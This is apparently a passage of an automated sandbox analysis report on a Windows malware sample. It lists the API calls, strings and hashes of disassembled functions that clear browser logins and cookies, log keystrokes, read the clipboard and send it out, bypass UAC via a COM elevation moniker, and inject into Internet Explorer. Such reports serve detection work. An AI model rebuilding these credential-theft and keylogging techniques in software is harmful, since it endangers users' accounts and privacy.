                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                            • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                            • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                            • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                            Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32 ref: 004168C2
                            • EmptyClipboard.USER32 ref: 004168D0
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                            • GlobalLock.KERNEL32(00000000), ref: 004168F9
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                            • CloseClipboard.USER32 ref: 00416955
                            • OpenClipboard.USER32 ref: 0041695C
                            • GetClipboardData.USER32(0000000D), ref: 0041696C
                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                            • CloseClipboard.USER32 ref: 00416984
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID: !D@
                            • API String ID: 3520204547-604454484
                            • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                            • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                            • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                            • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                            Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                            • FindClose.KERNEL32(00000000), ref: 0040BDC9
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                            • FindClose.KERNEL32(00000000), ref: 0040BEAF
                            • FindClose.KERNEL32(00000000), ref: 0040BED0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                            • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                            • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                            • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                            Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                            • API String ID: 3756808967-1743721670
                            • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                            • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                            • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                            • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                            Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7$VG
                            • API String ID: 0-1861860590
                            • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                            • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                            • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                            • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                            Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00407521
                            • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                            • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                            • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                            • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                            Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                            • GetLastError.KERNEL32 ref: 0041A7BB
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            • Opcode ID: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                            • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                            • Opcode Fuzzy Hash: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                            • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                            Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                            • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                            • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID: lJD$lJD$lJD
                            • API String ID: 745075371-479184356
                            • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                            • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                            • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                            • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                            Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                            • FindClose.KERNEL32(00000000), ref: 0040C47D
                            • FindClose.KERNEL32(00000000), ref: 0040C4A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 1164774033-405221262
                            • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                            • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                            • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                            • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                            Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                            • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID:
                            • API String ID: 2341273852-0
                            • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                            • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                            • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                            • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                            Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: 8SG$PXG$PXG$NG$PG
                            • API String ID: 341183262-3812160132
                            • Opcode ID: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                            • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                            • Opcode Fuzzy Hash: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                            • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                            Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                            • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                            • GetLastError.KERNEL32 ref: 0040A2ED
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                            • TranslateMessage.USER32(?), ref: 0040A34A
                            • DispatchMessageA.USER32(?), ref: 0040A355
                            Strings
                            • Keylogger initialization failure: error , xrefs: 0040A301
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                            • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                            • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                            • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                            Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                            • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                            • GetKeyState.USER32(00000010), ref: 0040A433
                            • GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                            • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                            • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID:
                            • API String ID: 1888522110-0
                            • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                            • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                            • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                            • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                            Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                            • GetProcAddress.KERNEL32(00000000), ref: 00414271
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                            • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                            • Opcode Fuzzy Hash: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                            • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                            Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00449212
                            • _free.LIBCMT ref: 00449236
                            • _free.LIBCMT ref: 004493BD
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                            • _free.LIBCMT ref: 00449589
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                            • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                            • Opcode Fuzzy Hash: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                            • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                            Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                              • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                              • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                              • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                              • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                            • GetProcAddress.KERNEL32(00000000), ref: 00416872
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: !D@$PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-2876530381
                            • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                            • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                            • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                            • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                            Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                            • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                            • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP$['E
                            • API String ID: 2299586839-2532616801
                            • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                            • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                            • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                            • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                            Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                            • GetLastError.KERNEL32 ref: 0040BA58
                            Strings
                            • UserProfile, xrefs: 0040BA1E
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                            • [Chrome StoredLogins not found], xrefs: 0040BA72
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                            • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                            • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                            • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                            Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                            • GetLastError.KERNEL32 ref: 0041799D
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                            • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                            • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                            • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                            Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00409258
                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                            • FindClose.KERNEL32(00000000), ref: 004093C1
                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
